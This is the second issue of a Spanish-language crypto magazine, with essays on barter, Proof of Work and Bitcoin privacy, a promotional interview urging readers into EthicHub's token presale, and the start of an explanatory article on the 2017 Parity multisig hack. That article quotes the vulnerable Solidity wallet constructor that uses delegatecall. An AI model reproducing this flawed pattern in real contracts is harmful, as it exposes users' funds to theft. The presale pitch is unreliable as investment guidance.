Decentralized Culture Magazine - # 2
PA R T I C I P A
CRYPTOECONOMICS
ETHICHUB
PRIVACIDAD
PA R I T Y
CRYPTOBAR
BRANDING
WEPOWER
SEGURIDAD
C R I PTO CO M PA R A D O R
COLABORA
TABL A DE CONT ENI D O S
2
004 ED I TO RI A L 006 PA RTI C I PA 009 CRY PTO ECO NO MI CS 014 ENTREVI STA A ETHI C HUB 022 L A MI RA DA I NVERSA Segu rida d en la blockch a in 026 SEGURI DA D EN SMA RT CO NTRACTS Hack d e l wa llet m u lt isig de Pa rity 034 L A B ARRA L I BRE D EL C RY PTO BA R 037 BLO CKBRA ND S El valo r d e la ma rca en la s cripto mo n eda s 040 CON VERSAN DO CO N CRI PTO CO MPA RA D O R. CO M 044 LEYEND O W H I TEPAPERS … WePower 050 SEGUR I DA D EN D O CE PA L A BRA S
3
EDI TORI AL Manel Tarh
Bienvenidos a un nuevo número del magazine Agorachain. Primero, debo sincerarme ante todo: en esta edición me cuesta más escribir por la repercusión y el éxito que ha tenido la primera, además de todas las personas interesadas en el proyecto y en que saliera adelante el siguiente número. Pues aquí lo tenemos. En esta edición se ha mejorado el diseño y aspecto del magazine, dando un toque más cuidado y minimalista, gracias a la ayuda y el trabajo inefable de Sergio García Gómez. También se ha incorporado al equipo Igor Domsac, a quien estamos eternamente agradecidos por encargarse de las correcciones ortográficas y gramaticales, tareas costosas y milimetradas a los buenos ojos. Mucha ilusión y proyección por delante también en lo que respecta al equipo. Ahora mismo, el embrión de AgoraChain va creciendo. Es fabulosa la energía que está envolviendo el proyecto, así como el entusiasmo por hacer de esta publicación algo único y con unos objetivos marcados que iremos revelando poco a poco. Todo esto nos une y hace que tengamos la fuerza e inspiración para demostrar hasta dónde llegan nuestras capacidades. Mientras tanto, vamos poco a poco acercando el mundo cripto a la sociedad, demostrando paso a paso que esto es posible. Un grupo joven que todavía debe crecer y que, aun así, demuestra encontrarse a la altura de las circunstancias. Últimamente se intenta predecir “qué sucederá este año”. Nosotros lo tenemos claro. Con el permiso de los lectores y las personas que apoyáis el proyecto, este 2018 será, sin duda, ¡¡¡AgoraChainer!!!
4
@xtarhx DONACIONES BTC:
1J4pvAnHnTJFVTNFk26azSb5GcqhZxRiSj
ETH:
0x65ec7821529b0955a7a71ee91a0152029fc02b63
WAVES:
3PATCKAdyNwUytpirUzSqMmY5WPuD3LJhEg
5
PARTIC I PA Gustavo Segovia
Es una pena que nuestra sociedad parezca guiarse automáticamente por ciertas normas y conceptos preestablecidos por una herencia cultural que no hemos decidido seguir ni adoptar, pero sin embargo ha sido capaz de moldear nuestros valores, creencias y comportamientos sin dar lugar alguno al cuestionamiento de los mismos ni ofrecer opciones para que pueda existir en realidad algo mejor a lo que ya damos como presupuesto. En la actualidad, manejamos e intercambiamos diariamente el dinero, y pareciera en muchos que generarlo supusiera el fin de nuestra existencia. Tenemos la impresión de que constituye un bien primordial para nuestra subsistencia, pues con él nos podemos procurar un techo, vestimenta, un coche (o, en su defecto, un billete de metro), y nuestro pan de cada día. Damos por sentado que sin él no podemos vivir y, aceptémoslo, mientras que todos demos por sentado lo mismo, aunque para unos pocos la necesidad del dinero sea solo una ilusión, el hecho de que las mayorías lo acepten como realidad significa que tal ilusión colectiva termina materializándose en realidad, incluso para aquellos “iluminados” que ven en el dinero un artificio que solo permite que los poderosos lo sigan siendo, mientras que otros se adentran en la llamada rat race o “carrera de ratas”, para someterse a un sistema que priva al individuo de su libertad plena a cambio de unos trozos de papel o unos números en una cuenta bancaria, papeles o números que, por cierto, habrán sido creados con mucho menos esfuerzo del que hemos aplicado nosotros para obtenerlos.
estar. Pero, ¿es el dinero el único medio para oxigenar la sociedad con la generación y distribución del valor? ¿Cómo funcionaba la economía de nuestros antepasados, cuando no teníamos bancos centrales que decidieran cuánta sangre iba a correr por nuestras venas? Según varios antropólogos, el inicio de la economía se dio con colaboraciones abiertas de los individuos para con sus comunidades, donde, más que esperar un valor a cambio de los bienes ofrecidos, las personas esperaban más bien asentar lazos relacionales con sus contrapartes en una economía de obsequios (esperamos retomar este tema con más detalle en una próxima edición). El trueque era en sí mismo un método muy eficaz de generación de valor, aun a pesar de presentar ciertos problemas, como el de la coincidencia de necesidades, donde un intercambio se podía dar solo al encontrar una contraparte que ofertara un bien o servicio que el individuo demandase, y viceversa, y el de la carencia de unidad de cuenta, que hacía muy difícil cuantificar qué tanto de un bien o servicio ofrecer a cambio de qué tanto del otro. Estos problemas los vino a resolver en un principio el dinero, pero a su vez introdujo otros, como la desigualdad causada por quienes por avaricia crearon pólizas monetarias y productos financieros que, más que generar un valor real o tangible, gestaron un humo financiero que luego dio lugar a grandes crisis económicas, haciendo al rico más rico y al pobre más pobre.
La economía moderna estudia los mecanismos de generación, intercambio y distribución de los bienes y servicios de una sociedad, y el dinero parece cumplir la función de un torrente sanguíneo que debe fluir por todo el ecosistema para que este se mantenga vivo, sano, y a la vez creciendo y generando bien-
6
Según Aristóteles, cada objeto tiene dos usos: el primero sería el propósito original para el cual fue diseñado, y el segundo la concepción del objeto como un artículo para dedicar al trueque (o vender una vez inventado el concepto de dinero). Analizando una transacción comercial simple entre tres agentes racionales de un mercado hermético e imaginario con solo tres productos que ofrecer, tenemos a Andrés, quien es dueño de las reservas de agua, también está Betty, quien produce pan, y Carlos, el tío de los chorizos. En una situación previa al intercambio que sus necesidades empujaran a ejecutar, el valor de mis excedentes es bajo para mí, es decir, Andrés cubre sus necesidades con una unidad de agua al día (digamos que una unidad equivale a dos litros en el caso del agua), pero los otros litros que aún tiene a disposición no tienen ya el mismo valor. Sin embargo, el excedente de panes de Betty tiene más valor para mí de lo que tendría para ella. Veámoslo con tablas y números. Asumamos que cada participante tiene tres unidades de su producto, y que para sobrevivir ese día necesita un producto de cada uno. Cada uno de estos productos a su vez tendrá un valor subjetivo para cada uno de ellos, y tal subjetividad depende de la necesidad de cada quien de tener una dieta completa. Es decir, para Andrés su primera unidad de agua podrá tener un valor de 10 T (unidad de valor imaginaria), mientras que la segunda y la tercera tendrán menos, aleatoriamente asignémosles 7 T y 3 T, respectivamente. También aleatoriamente, y con fines de simplificación (recordemos que la asignación del valor es subjetiva para cada personaje), lo mismo para Betty y Carlos. Resumiendo, tendríamos el siguiente inventario: Suministro
Valor de suministro en T
Andrés
3 uds. de agua
20 T (10 T + 7 T + 3 T)
Betty
3 uds. de pan
20 T
Carlos
3 uds. de chorizo
20 T
TOTAL
3 cestas básicas
60 T
Recordemos que T es un valor imaginario y emocional, puesto que los participantes están solo realizando un trueque. Podemos asumir, visto que cada individuo necesita para subsistir tanto una unidad de su producto como una unidad del producto de
7
8
los demás, que para cada uno de ellos el valor en T de los demás productos es igual a la primera de las unidades que cada individuo produce. Es decir, 10 T. De tal manera, una vez realizado el trueque para que cada quien tenga su cesta básica con una unidad de agua, otra de pan, y otra de chorizo, y a la vez el valor del total de sus productos se incremente en 10 T a cada uno, tendremos entonces una tabla de la siguiente manera: Suministro
Valor de suministro en T
Andrés
1 cesta básica
30 T (10T +10T + 10T)
Betty
1 cesta básica
30 T
Carlos
1 cesta básicao
30 T
TOTAL
3 cestas básicas
30 T
Se verifica entonces a simple vista cómo el trueque puede generar valor individual y grupal, no solo por el alza de esa unidad de valor imaginaria llamada T, sino que de no haberse hecho tal transacción los individuos no podrían continuar con sus vidas, y les habría sido imposible quizás construir casas, diseñar arte, tocar música, tener una familia, y generar todo el valor que una persona puede hacer a lo largo de su vida. Nuestra cultura, y específicamente nuestros sistemas de creencias, nos han enseñado que de economía y de sistemas financieros entienden solo las altas élites. De hecho, en muy pocos países enseñan economía como parte de nuestra educación básica. En realidad, las cosas podrían ser mucho más fáciles de lo que nos han hecho creer. Por primera vez en la historia de la humanidad disponemos de una tecnología que nos permite intercambiar bienes y servicios de la manera en que queramos y no como se nos ha impuesto.
@sepu85 DONACIONES
Así pues, el reto principal estará en obtener el llamado efecto red dentro de nuestras comunidades para que las nuevas economías que podremos y tendremos que diseñar aumenten su valor común y, por consiguiente, el bienestar de todos los individuos pertenecientes a ellas.
BTC:
1KiiX4tgdio5iHiszsCnnBS8RpuongrC7R
ETH:
0x6543c99d0e073c140Fd08A741c6cfdcd1449da94
BCH:
1MWqxbQMV9sjkuSCaT9pPR6zsKMH5DYMja
9
10
CryptoEconomics Uriel Herrera
Componentes de la criptoeconomía En la primera edición de AgoraChain Magazine, escribí sobre la criptoeconomía y su papel en el paradigma de la organización descentralizada. Definí criptoeconomía (apoyándome en la definición que da Vlad Zamfir) como “una disciplina que estudia los protocolos que rigen la producción, distribución y consumo de bienes y servicios en una economía digital descentralizada”. También hablé sobre el nuevo paradigma organizacional y de cómo es un paso lógico la descentralización de las organizaciones y el empoderamiento del usuario para convertirlo en un prosumidor, es decir, una persona que vele por la seguridad y la producción de valor en el interior de una organización descentralizada. En esta edición, para continuar sobre la misma línea de pensamiento, voy a iniciar una serie de artículos para dar a conocer los diferentes componentes que hasta el momento se han establecido y forman la naciente rama de la criptoeconomía, iniciando por lo que muchos detallan es el más relevante, o al menos uno de los más importantes: los algoritmos de consenso.
Algoritmos de consenso Los algoritmos de consenso juegan un papel fundamental en el interior de estos sistemas o protocolos descentralizados, ya que son el mecanismo por el cual los integrantes de la red llegan a acuerdos (dicho sea de paso, a decisiones consensuadas) de tal forma que se mantenga la integridad, seguridad y fidelidad del valor transmitido. Es además el mecanismo de defensa frente a ataques maliciosos, con el cual se busca que los mismos usuarios, en defensa de su interés, desplieguen poder computacional, de tiempo, monetario, etc.; y con ello defender el sistema en sí. Es importante recordar que en los sistemas descentralizados cualquier miembro teóricamente puede agregar información o crear valor. Por ende, resulta de vital importancia garantizar que, aunque exista desconfianza entre los integrantes, la información y el valor presentados cumplirán con los parámetros preestablecidos por el protocolo.
Este nuevo paradigma tiene como gran referente (para desgracia de unos y dicha de otros) a Bitcoin. Muchos ya conocen la historia del nacimiento de esta blockchain, que algunos llaman de primera generación, y de cómo Satoshi Nakamoto ideó el primer protocolo que resolvía el famoso problema de los generales bizantinos, el cual a su vez permitía el trasiego de valor por Internet, resolviendo el problema del doble gasto de un activo digital. Esto se logra gracias a su sistema de prueba de trabajo o Proof of Work, pieza fundamental en el armado del protocolo de Bitcoin, el cual es el encargado de regular la producción, distribución y hasta el consumo de las unidades monetarias que dan funcionamiento a esta red. Es decir, PoW es el primer componente o primer algoritmo de consenso por excelencia de este nuevo mundo de la criptoeconomía. Esto nos lleva a iniciar los análisis en este sistema, y en próximas ediciones abordaremos otros, como PoS, PBFT y DPoS.
11
Proof of Work o prueba de trabajo La prueba de trabajo consiste en la resolución o búsqueda de un hash criptográfico que cumpla con un formato definido en el protocolo. Este formato consiste en que el hash cuente con una determinada cantidad de ceros iniciales, los cuales varían dependiendo de la dificultad establecida. Esta dificultad es variable y autoajustable. Con esto se busca que, a pesar de que muchos trabajen tratando de ingresar información a la cadena de bloques, solo uno pueda hacerlo en un lapso determinado de tiempo. Este proceso conlleva la utilización de poder computacional, lo que garantiza que las personas que están compitiendo por encontrar un hash válido tienen interés en agregar solo información que cumpla con los parámetros establecidos en el protocolo por un tema de eficiencia económica. Es decir, si intentas atacar a la red suministrando información no válida y no consigues el respaldo necesario o consenso para que la información malversada se convierta en información aceptada en el interior del protocolo, habrás desperdiciado una gran cantidad de tiempo y recurso computacional que automáticamente se convierte en un coste monetario, por lo cual es muy poco probable que las personas deseen tirar recursos tratando de engañar a los demás si fácilmente pueden ser detectadas. En este proceso existe una figura clave dentro de la estructura del consenso y es la del minero, quien destina poder computacional para resolver los hash criptográficos. Se le llama minero pues su trabajo es comparable con la minería, ya que no existe un mecanismo que permita determinar un método más eficiente para encontrar el hash válido, más que el azar y la fuerza bruta, muy similar a lo que ocurría en California en 1848 con la búsqueda de los mejores puntos para la extracción de oro. Esta figura por lo general se ve motivada a aportar este poder com-
12
putacional mediante un incentivo económico, en muchos casos variable en el tiempo (esto dependerá de las especificaciones del protocolo y las políticas monetarias establecidas), y su función, además de encontrar un hash válido que permita agregar un bloque a la cadena, es asegurarse de que le sea más caro a un atacante adquirir el poder computacional necesario para atacar al sistema. Por ejemplo, y tomando el modelo de la cadena de bloques con PoW más grande o con mayor éxito hasta la fecha, Bitcoin cuenta con una estructura de incentivos que garantiza a los usuarios que aportan poder computacional (es decir, los mineros) una recompensa por su trabajo. Así, cuando el valor del Bitcoin aumenta, y por lo tanto atacar al sistema se torna más rentable, también se torna más rentable para los usuarios honestos añadir recursos computacionales a la red. En este sistema, el azar juega también un papel fundamental. Dado que no se puede determinar una entrada X para obtener un hash válido, y que cada bloque que se encuentra debe hacer referencia al bloque anterior, los mineros deben aceptar lo más rápido posible el bloque descubierto para iniciar el minado o búsqueda del próximo bloque válido. Esto incentiva la existencia de una sola cadena, a pesar de que en determinados casos pueden existir varias cadenas al mismo tiempo. Este factor es fundamental a la hora de mantener el consenso, debido a que si un atacante no logra consolidar el poder computacional necesario para agregar los suficientes bloques, de manera que todos reconozcan la cadena que se está construyendo como válida, sufrirá una pérdida económica asociada al coste de computación y electricidad invertidas en el ataque no fructuoso. Básicamente y a grandes rasgos, podemos aseverar que la estructura y función del algoritmo de consenso PoW son básicamente: 1) proteger la red y 2) garantizar la información contenida, ambas de una manera consensuada mediante incentivos económicos.
@Urieldhf DONACIONES BTC:
16VuQqSGLA1SCTM1avEzh3M6cJ9EsniY9N
ETH:
0x79e14ddddb4cdfd0b54bf4234c6075a2499ec145
13
E NTREV I STA A ET HI C HUB
14
¿Podéis explicar en qué consiste Ethic Hub? Es una plataforma que pone en contacto a pequeños agricultores desbancarizados, acostumbrados a pagar altos intereses por préstamos en efectivo, con inversores de todo el mundo, beneficiando a ambas partes a través de menores intereses para el agricultor y alta rentabilidad para el inversor.
¿En qué se diferencia de otras plataformas de crowdlending? En dos aspectos principalmente: - Nuestro “nicho de mercado”: más de mil millones de agricultores desbancarizados. - Y, debido a sus características, proponemos que la evaluación del riesgo la haga un nodo local, que es una persona que conoce personalmente a los agricultores, los selecciona y los agrupa para solicitar un préstamo cooperativo. Hay otras diferencias importantes: - Los préstamos son solo para proyectos productivos, no para consumo, que genera endeudamiento. - Integramos un fondo de garantía que compra los derechos de crédito en caso de impago para evitar el perjuicio del inversor y para garantizar un recobro ético de la deuda. - En nuestra plataforma solo hay comisiones en caso de éxito. - La gobernanza quedará en manos de los usuarios, no de los tenedores de tokens. - Nos enfocamos en la misión y los valores a la hora de construir el proyecto. Y muchas otras, ya que finalmente lo que intentamos es proponer un sistema financiero pensado desde cero, más inclusivo, más eficiente, mejor…
15
Ethic Hub ha sido galardonada con el premio #Blockchain4Humanity en la conferencia internacional LaBitConf2017. ¿Qué ha significado para el equipo la obtención del galardón? Fueron una sorpresa y una alegría indescriptibles, ya que ni sabíamos que existía. Fueron miembros de nuestra comunidad que estaban allí los que nos propusieron y eso nos alegró doblemente, además de suponer un salto de calidad en súper-credibilidad. Un ejemplo clásico de este concepto es que si el hijo de tu vecino dice que quiere ir a Marte, te reirás (espero que solo por dentro), pero si lo dice y tiene de socio a Elon Musk, la pregunta más bien es: ¿cuándo? Antes éramos cuatro locos persiguiendo una quimera, ¡ahora la gente empieza a tomarnos en serio!
El logotipo y el símbolo están muy cuidados, ¿no? ¡Me alegra que digas eso! Siempre ves muy guapo a tu hijo, pero que lo digan otros supone la satisfacción de un trabajo bien hecho. Hemos pasado por muchos nombres y logos antes y seguimos pensando siempre cómo mejorar la imagen.
¿En qué ética os basáis? Este ha sido un debate muy intenso en nuestro canal de Telegram. Ha habido personas que creían que no era ético que un inversor se beneficiara con el trabajo de un pequeño agricultor. El problema con la ética es que no es algo claramente definido, depende de cada sociedad e incluso de cada persona (la definición), y muchas veces se confunde con el altruismo. Al final, la comunidad decidió que siguiéramos llamándonos Ethic Hub, ya que lo que buscamos es el beneficio mutuo.
¿Qué va a ofrecer Ethic Hub? A los inversores, una alta rentabilidad en proyectos de impacto positivo. A los agricultores, acceso a financiación a unos costes inmejorables localmente.
16
A los nodos locales, una nueva forma de autoempleo que permite vivir muy bien ayudando a su comunidad. A la sociedad, revalorizar la reputación y hacer que ser cumplido se perciba como un buen negocio, ya que los prestatarios con mejor historial de pago podrán financiarse con menores intereses y tendrán acceso a más capital, y los nodos locales que hagan bien su trabajo podrán intermediar cada vez más préstamos y de mayor importe, ganando cada vez más comisiones (a éxito).
¿Cómo se realizan esos préstamos colectivos? La clave es el nodo local, la persona que conoce la comunidad de pequeños agricultores. Él los agrupa, les explica los beneficios de ser buenos pagadores, la responsabilidad que implica para con su comunidad y con el ecosistema en su conjunto. Identifica a todos los partícipes y verifica la productividad de sus terrenos, firman un contrato y nombran un representante, que será el que abrirá una cuenta bancaria en la que se recibirán los fondos. Pero todo esto te lo puede explicar mucho mejor nuestro cofundador Pablo Chang, que se ha dedicado a esto muchos años.
¿En qué tecnologías se basa el proyecto? Lo que hacemos es aplicar blockchain a una actividad que ya existía, y de esta forma permitir que los fondos lleguen desde países donde hay mucha más liquidez y por ello unos intereses mucho menores. Blockchain permite que existan los contratos inteligentes que operan los contratos de préstamo, el contrato inteligente que genera los tokens de reputación, el contrato inteligente del fondo de garantía, el contrato inteligente que genera los tokens de gobernanza y los tokens que permiten mover el dinero por el mundo prácticamente sin coste. Blockchain permite generar más confianza gracias a la total transparencia y la inmutabilidad de las operaciones, y la confianza es la base del crédito.
17
¿Tenéis pensadas alianzas con otras plataformas? Hay muchas alianzas posibles, pero por ahora creemos que lo primero es prototipar nuestro sistema y validar las hipótesis del modelo de negocio. Dentro de unos meses empezaremos con este trabajo.
¿Podéis darnos alguna primicia? Te voy a dar dos noticias muy importantes para nosotros. La primera es que la auditoría del contrato inteligente de la preventa ha ido magníficamente bien. El auditor ha dicho que es uno de los mejores, ¡si no el mejor contrato que había visto! ¡Tenemos un equipo de desarrollo excepcional! La otra noticia es que nos ha listado Coin Jinja. Quizás en España no suenen, pero tienen 400.000 visitas y son el referente en Japón. Y la noticia no es esa, ¡es que lo han hecho sin que se lo pidamos! Un día apareció un japonés en la whitelist diciendo que nos había conocido en Coin Jinja.
¿Qué impacto esperáis generar en el mundo? Nuestra visión es convertirnos en el referente de crowdlending internacional para proyectos de impacto positivo. Si lo logramos habremos conseguido incorporar a la economía global a decenas e incluso centenas de millones de personas. Y no solo eso, como nuestro sistema se basa en el beneficio mutuo y en la revalorización de la reputación, creemos que habremos sembrado una conciencia positiva en la sociedad en su conjunto. Por último, creo que conseguir hacer algo grande y que genere un impacto positivo en el mundo supone un ejemplo para que otros emprendedores decidan hacer lo mismo, dejar el dinero en un segundo plano y no perder nunca de vista el impacto a la hora de emprender.
¿Cuál ha sido vuestro mayor reto? Convencer a la gente de que esto era posible. Crear un equipo y una comunidad en torno a este sueño tan bonito. Creo que eso ya lo hemos conseguido y, como decia antes, el brochazo definitivo fue el premio de Blockchain4Humanity. A partir de la preventa, el reto será convertir ese sueño teórico en un caso de éxito que de verdad tenga un impacto en el mundo.
18
19
¿Algún consejo para aquellas iniciativas colaborativas? La comunidad lo es todo, y para crear una comunidad debes tener un propósito de transformación masivo y unos valores alineados con esa misión. Esta ha sido nuestra experiencia. Y creo que para mantener y escalar esta comunidad, la clave es ser coherente con esos valores y dar gobernanza a los usuarios para que se genere una afiliación real con el proyecto. También creo que para que se produzca un crecimiento exponencial es imprescindible la recomendación de los propios usuarios. Pero esto por ahora solo es teoría, ¡ahí todavía no hemos llegado!
¿Qué tramáis en vuestras cabezas? “¡Lo mismo que hacemos todas las noches, Pinky, tratar de conquistar el mundo!”. Conquistar en el sentido de que la abundancia triunfe sobre la escasez y la descentralización sobre la centralización. En el sentido de que la economía deje de ser solo números para tener en cuenta también a las personas y al entorno en el que vivimos.
Todos tenemos personas que nos iluminan. ¿Nos podéis hablar de ellas? El otro día, Raúl (nuestro CTO) y yo caímos en la cuenta de que los dos nos habíamos enamorado del mundo de blockchain gracias a los Tapscott. En mi caso, además, debo reconocer a tres personas que han sido fundamentales: mi mentor Félix Lozano, cofundador de TeamLabs, la escuela de negocio donde hice un máster de innovación y emprendimiento. Él me ayudó a encontrar dentro de mí a qué me debía dedicar. A Javier Lafora, compañero en ese máster, por haber sido el primero que me llamó la atención sobre blockchain y el concepto de las organizaciones exponenciales, y a Alex Casas, fundador de Shelpin, por habernos apoyado en todo momento y habernos recomendado para el premio en LaBitConf.
20
Podría pasarme el día entero dando gracias a todas las personas que han hecho que tengamos la oportunidad de poder demostrar que este sueño es posible...
Muchas gracias por facilitar la entrevista. Fue un placer contar con vosotros en esta segunda edición del magazine. Por último, si queréis añadir algo, es vuestro momento... ¡Muchas gracias a vosotros por darnos la oportunidad de contar nuestro proyecto! Ethic Hub, aprovechando blockchain, promueve un sistema económico más justo e inclusivo. ¡Ayúdanos a hacer realidad este sueño participando en la preventa dentro de ethichub.com y comprueba que ayudar puede ser rentable!
21
LA MIR ADA I NV ERSA Javier Domínguez Gómez
Pr iva c i da d e n blockchain Desde que Satoshi Nakamoto inició el proyecto Bitcoin en 2008, y su puesta en marcha en 2009, han coexistido diferentes opiniones respecto a la privacidad de los usuarios. Recordemos que él mismo explica en el whitepaper [1] que el sistema de banca tradicional oculta los datos personales y transacciones de sus clientes, proporcionando así cierto grado de privacidad entre las partes implicadas y terceros de confianza. Bitcoin cambiaría las reglas del juego, haciendo públicas todas las transacciones y depositando toda la privacidad en las claves públicas de cada usuario, en cuyo caso no se pueden ver el nombre y apellidos de la persona que está haciendo una transferencia ni tampoco de la persona que recibe los fondos. En un primer momento, esto puede parecer suficiente, ya que si se evita registrar datos personales en la blockchain, las transacciones no se podrán vincular a una persona en concreto. En realidad, esto no es del todo cierto. Satoshi escribe en el mismo paper que, para garantizar una mayor privacidad, el usuario ha de utilizar de forma adicional un nuevo par de claves, pública y privada, en cada transacción que quiera realizar. Solo así se evitaría que una dirección de Bitcoin se asocie a un usuario permanentemente. El motivo por el que Satoshi sugiere esta contramedida es porque existe el riesgo de vincular a una persona con una clave pública o dirección Bitcoin. De este modo, se pueden buscar en el registro de la
blockchain todas las entradas y salidas asociadas a esa dirección, revelando así los movimientos y fondos de dicha persona. Así pues, si seguimos la recomendación de Satoshi, cada vez que queramos recibir una transferencia, solo tenemos que generar una nueva dirección y proporcionársela al emisor. En realidad, esto no garantiza una privacidad total: siempre existirá el riesgo de que se revele la identidad que hay detrás de una clave pública o dirección Bitcoin. Pongamos un ejemplo: Bob quiere vender un objeto a Alice a cambio de una cantidad de BTC. Bob le proporciona su dirección Bitcoin a Alice para que ella pueda realizar una transferencia en BTC a esa dirección. En el momento en que la transacción se haga efectiva, Bob podrá buscar el código de la transacción en la blockchain y este podrá ver la dirección desde la que Alice le hizo la transferencia. A su vez, Bob podrá ver los inputs y outputs que esta dirección de Alice ha tenido a lo largo del tiempo. Al mismo tiempo, Alice puede buscar la dirección de Bob en la blockchain y de la misma manera buscar todos los inputs y outputs que esa dirección de Bob ha tenido, con datos tan precisos como el monto, la fecha y el origen de esos inputs (otras direcciones). Ahora Bob y Alice se pueden husmear mutuamente sobre lo que ingresan o pagan, al menos en esas direcciones.
22
Otro ejemplo totalmente comprobable: si queremos ver los inputs y outputs que tiene la Free Software Foundation en la dirección Bitcoin que aparece en su web para recibir donaciones [2], solo tenemos que copiar dicha dirección y buscarla en la blockchain de Bitcoin [3].
No podemos ver datos personales de los usuarios que realizan donaciones, aunque sí sus direcciones, y lo más interesante es que se puede rastrear qué donaciones se realizan, de cuántos BTC y cuándo se han realizado. Véase que la primera transacción a esta dirección Bitcoin de la Free Software Foundation [4] se realizó el 5 de mayo de 2011 a las 20:40:14, y se donaron 0,01 BTC. Ese día el precio de 1 BTC era de 3,33 $.
23
También nos exponemos a otro grave problema de privacidad cuando se utilizan casas de cambio o exchanges para realizar compras de criptomonedas. Normalmente, estos te piden una gran cantidad de datos personales, que deben ser reales, como nombre, apellidos, documento de identidad, pasaporte, y algún tipo de factura doméstica como la del teléfono o el gas, resguardo del banco, etc. [6]. El proceso de registro y validación en un exchange para poder realizar ingresos o retirada de fondos en moneda fiat, como dólares, yuanes o euros, implica cederle voluntariamente todos nuestros datos privados a una entidad de terceros, la cual no sabemos qué hará después con nuestros datos. Estos exchanges te proporcionarán un par de claves, pública y privada, pero ellos tendrán este par de claves automáticamente asociadas a tu persona. Así pues, da igual cuántas veces generes un nuevo par de claves en el exchange, siempre sabrán que eres tú. Por suerte o por desgracia, si queremos ser poseedores de criptomonedas como Bitcoin o Ethereum, tenemos la posibilidad de prescindir de estas casas de cambio: simplemente tenemos que instalar un gestor de claves o monedero en nuestro ordenador, un wallet para aquella criptomoneda que deseamos tener, a continuación generar un nuevo par de claves para obtener una nueva dirección y pedirle a alguien que nos ingrese un monto acordado de esa criptomoneda en esa dirección, y finalmente pagarle en mano con dinero fiat el equivalente a la cantidad transferida. Solo de ese modo evitas facilitar tus datos personales a terceros, pero esto también tiene sus inconvenientes. El primero es que la persona con la que se acuerda esa transferencia de valor podría saber tu nombre y apellidos. Por ejemplo, si es un amigo. Así pues, ya sabe quién está asociado a una dirección Bitcoin en concreto y
podrá husmear en ella. El segundo problema es que el cambio de dinero fiat en mano se ha de realizar bajo ciertas garantías de confianza, ¿me ingresas tú primero los BTC, o yo te doy mis euros primero? Otro gran problema es el de la fungibilidad o uso de ciertas cantidades de dinero: no parece razonable entregarle a un amigo 50.000 $ en mano, pues no es seguro y probablemente se esté incumpliendo alguna ley. Esto incitaría a algunas personas a cometer actos fraudulentos o lavado de dinero. Existen otras criptomonedas, como Bytecoin o Monero, que utilizan tecnología CryptoNote [7], la cual proporciona un sistema de anonimato muy superior al que ofrece actualmente Bitcoin, por lo que no está todo perdido. Parece que vamos mejorando. De cualquier modo, parece complicado mantener la privacidad a salvo utilizando blockchain para comprar Bitcoin. Es cierto que no todo el mundo posee los conocimientos para poder rastrear a una persona en la cadena de bloques, pero aquellas personas, organizaciones o entidades que se dedican profesionalmente a ello saben muy bien cómo hacerlo. Así pues, no deberíamos regalar nuestros datos a cualquier exchange, no deberíamos utilizar el mismo par de claves para todo, y sobre todo no deberíamos usar blockchain para registrar todo. En mi opinión, esta es una idea errónea, y cada vez se la escucho a más gente. Blockchain es una tecnología fascinante, matemáticamente brillante a la vez que perfectamente imperfecta, pero hemos de usar la tecnología con moderación, con conocimiento y sobre todo con respeto por los derechos y libertades de los usuarios, pues la seguridad reside principalmente en la gestión de la misma por parte del individuo, no en la tecnología en sí.
24
Referencias
[1] https://bitcoin.org/bitcoin.pdf [2] https://my.fsf.org/donate/ [3] https://blockchain.info [4] 1PC9aZC4hNX2rmmrt7uHTfYAS3hRbph4UN [5] Teóricamente posible, físicamente (hoy) imposible. [6] KYC (https://es.wikipedia.org/wiki/Conozca_a_su_cliente) [7] https://cryptonote.org/whitepaper.pdf
@JavDomGom DONACIONES BTC:
39j2KV3vPsmPSzDum4hkc4uDyaC24Fhx11
ETH:
0x8032fc06d0c1702875d044df5acd8aac43ea6380
ZEC:
t1Wihj6uZT8kvWvr4EM7h1KHchC6Rh4Xcfb
25
SEGURIDAD EN
SMART CONTRACTS Albert Palau
Hack del wallet multisig de Pa r i t y Importancia de la seguridad en smart contracts, conocimientos de Solidity: assembly, fallback function, etc.
El 19 de julio de 2017, uno de los wallets más famosos de Ethereum, liderado por uno de los cofundadores de la plataforma, Gavin Wood, fue víctima de un hackeo por parte de un atacante anónimo, dando lugar al robo de unos 30 millones de USD[1]. En el siguiente link podéis encontrar un comunicado oficial de lo sucedido: https://paritytech.io/the-multi-sig-hack-apostmortem. Pero, ¿qué pasó exactamente? En este artículo se expondrán los detalles técnicos y la vulnerabilidad que albergaban los wallets multisig, es decir, wallets que necesitaban más de una firma para liberar fondos. También se han desarrollado simples smart contracts para que podáis explotar la vulnerabilidad vosotros mismos. La comunidad debe concienciarse de la gran importancia de la seguridad que debe existir en el desarrollo de smart contracts. Antes de nada, para el caso que se quiere exponer, es importante conocer cómo están diseñadas dos piezas fundamentales en el funcionamiento de estos wallets: Versión del código con el bug: https://github.com/
paritytech/parity/blob/4d08e7b0aec46443bf26547b17d10cb302672835/js/src/contracts/snippets/enhanced-wallet.sol En la blockchain de Ethereum se crea una única versión de la librería, que contiene la mayor parte de la lógica, y después se crean los wallets, por parte de los usuarios que hacen uso de esta librería. Al ser contratos más pequeños, argumentan, el coste en GAS (y por lo tanto en ETH) necesario para desplegar estos contratos era menor. Al, potencialmente, desplegar muchos contratos multisig, este argumento tiene sentido.
26
Si revisamos el código en github de la versión vulnerable, veremos que en el constructor del contrato wallet realiza lo siguiente (línea 399): function Wallet(address[] _owners, uint _required, uint _daylimit) { // Signature of the Wallet Library’s init function bytes4 sig = bytes4(sha3(“initWallet(address[],uint256,uint256)”)); address target = _walletLibrary; // Compute the size of the call data : arrays has 2 // 32bytes for offset and length, plus 32bytes per element ; // plus 2 32bytes for each uint uint argarraysize = (2 + _owners.length); uint argsize = (2 + argarraysize) * 32; assembly { // Add the signature first to memory mstore(0x0, sig) // Add the call data, which is at the end of the // code codecopy(0x4, sub(codesize, argsize), argsize) // Delegate call to the library delegatecall(sub(gas, 10000), target, 0x0, add(argsize, 0x4), 0x0, 0x0) } }
